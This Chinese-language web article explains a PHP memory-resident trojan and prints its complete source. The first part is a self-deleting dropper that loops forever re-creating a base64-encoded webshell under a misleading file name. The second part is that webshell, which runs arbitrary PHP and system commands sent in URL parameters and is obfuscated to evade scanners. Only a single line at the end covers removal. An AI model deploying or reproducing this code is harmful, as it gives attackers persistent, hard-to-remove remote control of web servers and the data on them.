PHP內存木馬病毒實現原理是什么

本篇內容介紹了“PHP內存木馬病毒實現原理是什么”的有關知識，在實際案例的操作過程中，不少人都會遇到這樣的困境，接下來就讓小編帶領大家學習一下如何處理這些情況吧！希望大家仔細閱讀，能夠學有所成！

病毒源代碼 (很簡單)

<?php
//設置腳本不超時
set_time_limit(0);ignore_user_abort(true);
//刪除文件本體
@unlink(__FILE__);
//給木馬病毒起一個迷惑性的名字
$file = './getUserInfo.php';
//死循環常駐內存。釋放木馬文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh6eHN4eHh5eHh0eHhleHh5bXh5eHh5eHh5Jyk7CiAgICAkZigkcyk7Cn0='));
 sleep(60);
}

釋放病毒本體

<?php
//以下代碼實現了eval關鍵字和system函數的偽裝
//eval($_GET['e']);
if($e = @$_GET['e']) {
    $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));
    $func();
}
//system($_GET['s']);
if($s = @$_GET['s']) {
    $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');
    $f($s);
}

說明

• 以上關鍵敏感代碼都做了編碼，用于避開各種安全掃描的免殺。

• 一旦病毒樣本運行起來，就會刪除掉自身，并長期運行在內存當中。

• 就算被釋放的木馬被識破后刪除，還會產生同樣的文件。

解決方案

干掉進程后，刪除釋放的木馬文件。

“PHP內存木馬病毒實現原理是什么”的內容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業相關的知識可以關注億速云網站，小編將為大家輸出更多高質量的實用文章！